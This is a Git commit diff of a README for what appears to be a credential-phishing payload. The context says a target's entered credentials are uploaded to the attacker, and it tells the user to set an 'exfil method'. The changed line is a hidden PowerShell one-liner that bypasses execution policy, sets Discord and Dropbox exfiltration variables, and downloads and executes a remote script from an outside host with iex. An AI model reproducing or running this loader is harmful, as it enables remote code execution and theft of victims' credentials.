Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:23:34 -06:00 committed by GitHub
parent 1eb9d379b0
commit 60273144a2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -47,7 +47,7 @@ Once the target enters their credentials their information will be uploaded to y
* Fill in either variable or both to set your exfil method
```
powershell -w h -ep bypass $dc='';$db='';iwr https://jakoby.lol/35k | iex
powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>